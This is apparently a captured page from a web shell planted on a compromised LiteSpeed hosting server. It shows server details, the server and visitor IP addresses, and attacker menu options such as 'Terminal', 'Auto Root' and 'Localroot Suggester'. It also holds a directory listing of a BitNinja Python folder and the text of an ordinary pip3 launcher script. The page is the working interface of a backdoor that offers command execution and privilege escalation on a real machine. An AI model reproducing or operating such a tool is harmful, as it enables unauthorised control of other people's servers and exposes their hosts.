Linux bear.hostingplus.cl 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
LiteSpeed
Server IP : 192.140.57.17 & Your IP : 216.73.216.106
Domains :
Cant Read [ /etc/named.conf ]
User : explo
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
bitninja-python-dojo /
embedded /
bin /
Delete
Unzip
Name
Size
Permission
Date
Action
2to3
125
B
-rwxr-xr-x
2026-03-11 06:54
2to3-3.9
125
B
-rwxr-xr-x
2026-03-11 06:54
c_rehash
6.57
KB
-rwxr-xr-x
2026-03-11 06:54
captoinfo
99.96
KB
-rwxr-xr-x
2026-03-11 06:54
clear
10.9
KB
-rwxr-xr-x
2026-03-11 06:54
idle3
123
B
-rwxr-xr-x
2026-03-11 06:54
idle3.9
123
B
-rwxr-xr-x
2026-03-11 06:54
infocmp
67.24
KB
-rwxr-xr-x
2026-03-11 06:54
infotocap
99.96
KB
-rwxr-xr-x
2026-03-11 06:54
ncurses6-config
8.61
KB
-rwxr-xr-x
2026-03-11 06:54
ncursesw6-config
8.61
KB
-rwxr-xr-x
2026-03-11 06:54
openssl
756.34
KB
-rwxr-xr-x
2026-03-11 06:54
pip
971
B
-rwxr-xr-x
2026-03-11 06:54
pip3
973
B
-rwxr-xr-x
2026-03-11 06:54
pip3.9
977
B
-rwxr-xr-x
2026-03-11 06:54
plyara
248
B
-rwxr-xr-x
2026-03-11 06:54
pydoc3
108
B
-rwxr-xr-x
2026-03-11 06:54
pydoc3.9
108
B
-rwxr-xr-x
2026-03-11 06:54
python3
35.21
KB
-rwxr-xr-x
2026-03-11 06:54
python3-config
3.11
KB
-rwxr-xr-x
2026-03-11 06:54
python3.9
35.21
KB
-rwxr-xr-x
2026-03-11 06:54
python3.9-config
3.11
KB
-rwxr-xr-x
2026-03-11 06:54
reset
23.12
KB
-rwxr-xr-x
2026-03-11 06:54
tabs
15.01
KB
-rwxr-xr-x
2026-03-11 06:54
tic
99.96
KB
-rwxr-xr-x
2026-03-11 06:54
toe
15.02
KB
-rwxr-xr-x
2026-03-11 06:54
tput
23.14
KB
-rwxr-xr-x
2026-03-11 06:54
tset
23.12
KB
-rwxr-xr-x
2026-03-11 06:54
Save
Rename
#!/opt/bitninja-python-dojo/embedded/bin/python3 # EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.1','console_scripts','pip3' import re import sys # for compatibility with easy_install; see #2198 __requires__ = 'pip==19.0.1' try: from importlib.metadata import distribution except ImportError: try: from importlib_metadata import distribution except ImportError: from pkg_resources import load_entry_point def importlib_load_entry_point(spec, group, name): dist_name, _, _ = spec.partition('==') matches = ( entry_point for entry_point in distribution(dist_name).entry_points if entry_point.group == group and entry_point.name == name ) return next(matches).load() globals().setdefault('load_entry_point', importlib_load_entry_point) if __name__ == '__main__': sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) sys.exit(load_entry_point('pip==19.0.1', 'console_scripts', 'pip3')())